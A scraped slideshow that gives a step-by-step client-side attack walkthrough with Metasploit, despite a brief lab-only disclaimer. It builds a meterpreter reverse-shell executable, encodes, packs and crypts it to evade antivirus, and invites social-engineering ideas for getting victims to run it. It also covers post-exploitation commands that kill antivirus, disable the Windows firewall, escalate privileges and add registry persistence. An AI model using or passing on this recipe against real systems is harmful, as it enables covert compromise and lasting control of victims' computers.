Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Client side exploits


Published on

Published in: Technology
  • Be the first to comment

Client side exploits

  1. 1. Client Side Exploits Metasploit, Meterpreter, Obfuscation , Rogue Websites and Ettercap.
  2. 2. Tools • Kali Linux:  Metasploit (msfconsole, msfpayload, msfencode)  Ettercap  Apache • Windows  Nemesis Crypter  .Net Shrink  DeepSea Obfuscator
  3. 3. Testing Environment pt.1 All examples shown will be performed in a controlled network, I do not condone the use of these methods in the wild. Host Network Host Computer Virtualised Environment (Oracle VirtualBox)  WAN  LAN Virtual Router (pfSense)  WAN  LAN Attacker (Kali) Client (Win7)
  4. 4. Testing Environment pt.2 VirtualBox Configuration 1. 2. 3. 4. 5. Download pfSense ISO ( Create new VM using wizard Install 2 NIC’s NIC 1 should be configured to use NAT NIC 2 should be configured to use Internal Network
  5. 5. Testing Environment pt.3 Kali Linux Configuration 1. 2. 3. 4. 5. Apt-get update, upgrade, dist-upgrade, install -y linux-headers-$(uname -r) cp /media/cd-rom/ /root/ chmod 755 /root/ cd /root ./ update-rc.d postgresql enable update-rc.d metasploit enable msfupdate
  6. 6. Metasploit pt.1 Payload Creation • Using msfpayload –h we can see all the available options. • Using –l will show all of the available payloads, for this example me will be generating a meterpreter shell to connect back to the attacker due to its flexibility. • Selecting the meterpreter reverse tcp payload • Using msfpayload windows/meterpreter/reverse_tcp O will give use the payload options which we will input in the next step • X to create an executable • > pay.exe – exports the payload to filename pay.exe • We will now have the executable pay.exe on our desktop Here we can choose how to output the payload, we can export to C, Ruby for later compiling or we can export to Java if we wanted to create an applet attack. For this example however we will be exporting to an executable for an infectious media attack We have 2 configurable options for this payload: 1. LHOST – this is the address of the attacking machine (for this lab we will use a local address however you can use an external address for a remote attack) 2. LPORT – this is the port used to connect back to the attacker, for this lab we will use port 4444 however if you are behind a restrictive firewall you may want to select a port that will be open e.g 443 (ssl) or 53 (dns). Also if this is a remote attack you would have to port forward the selected port
  7. 7. Checking Our Work • Uploading the file to Metascan will check our payload against 43 antivirus scanning engines • Unfortunately the payload we created was detected 26 times, we now have to work on lowering this detection rate
  8. 8. Metasploit pt.2 Payload Encoding We use msfencode using the same command, however we now use the switch “R” to output the file as RAW and use “|” to pipe the file into msfencode • the raw output of the prevous command is piped into another encoder using “|” • We use msfencode –e x86/countdown –c 5 –t exe – o payenc.exe to encode the file again and then output the resultant to payenc.exe Note: this is by no means a comprehensive coverage of msfpayload or msfencode, I suggest reading Metasploit: The Penetration Testers Guide for full usage of these tools. Msfencode: • -e – selects the encoder (in the example shikata_ga_nai is used) • -c – sets the number of times the payload is encoded • -t – sets the output file to RAW Lastly we will pack our file to add an extra layer of obscurity using the following command: Upx -9 payenc.exe payencpacked.exe
  9. 9. Checking Our Work • • Uploading the file shows the results are not good, antivirus vendors are getting wise towards the encoders we used. We now need to utilise some other methods to Obfuscate the payload further
  10. 10. Obfuscation pt.1 Over to you Windows Nemesis Crypter 1. Main – select location of file 2. Options - set the encryption algorithm to AES 3. Assembly Information – Set to random 4. Crypt file
  11. 11. Checking Our Work Notice a Pattern Emerging • Ok so that’s a good enough detection rate. • Its interesting to note that all the free antivirus vendors failed to detect our payload (AVG I'm looking at you) whilst Norton and Kaspersky still detected, thus highlighting the need to PAY for a good antivirus.
  12. 12. Obfuscation pt.2 .net Shrink • No one method is fool proof, however there are hundreds of tools to further obfuscate your payload you just need to experiment DeepSea Obfuscatior .net Reactor • • Antivirus vendors will eventually become wise to all encoders and obfuscators I hope this highlights the importance of having a good antivirus (remember to laugh at apple fan boys when they say they are immune to viruses)
  13. 13. Where are we now We now have a payload that has a low detection rate…….what do we do now? Two things need to be accomplished: 1. We need a method for the payload to connect from the client machine to the attacking machine (this is a client side attack remember) 2. We need a way to get the victim to execute the payload (think social engineering, I will look forward to hearing your ideas)
  14. 14. Metasploit pt.3 • • Remember that we programmed our payload to reverse connect to We now need to set metasploit to listen for connections on Start metasploit using msfconsole Starts listening for client connections
  15. 15. Metasploit pt.3 cont. Set LHOST – sets the listen address which is the ip of the attacker machine set LPORT – sets the listen port Exploit – starts the listener The attacking machine is now ready to accept incoming connections
  16. 16. • User on client machine clicks malicious file • notice that nothing suspicious happens • user assumes that it is just a broken file • little do they know…… Meanwhile the attacker machine has accepted a remote connection from the client A meterpreter session is now open
  17. 17. if we issue a netstat –a on the client machine to list all remote connections we see the connection from (the client) to (the attacker)
  18. 18. Meterpreter Post-Exploitation We have our meterpreter session to the client machine we now need to ensure the client stays compromised: 1. Kill any antivirus (although our payload hasn't been detected, any future modifications may reveal the payload to the antivirus). 2. Kill firewall 3. Migrate the meterpreter session to a secure process 4. Elevate our privileges 5. Make our meterpreter session persistent through reboots
  19. 19. Idletime - we don’t want to run these commands when the user is present Ps – shows the running processes on the client machine We now need to disable the antivirus , in this case the client is running security essentials msseces.exe = 2356 so we issue kill 2356 (note: it is useful to familiarise yourself with the processes other antivirus packages use). Currently meterpreter is running as process “abc.exe” which is highly suspicious, using the migrate command we will run meterpreter as “explorer.exe” (note: when using meterpreter we use the PID number rather than the process name e.g. explorer.exe = 1424). Using “getsystem“ and “getprivs” gives us the system user account and all the associated privileges. Using “shell” we drop down into the windows command line and issue the command “netsh advfirewall set allprofiles state off”. The windows firewall is now off. The system is now defenceless and we have complete control. I hope this slide has demonstrated the multidisciplinary nature of hacking by using both the Linux and windows command line. I would recommend reading the following texts to further familiarise yourselves with both command lines.
  20. 20. Meterpreter Maintaining Access 1. Use the “shell” command to get a windows command prompt 2. We are now going to add a registry key that executes the payload at every boot by using the command reg add “path to registry key” 3. /v names the registry key 4. /t specifies the key type 5. /d defines the path to our executable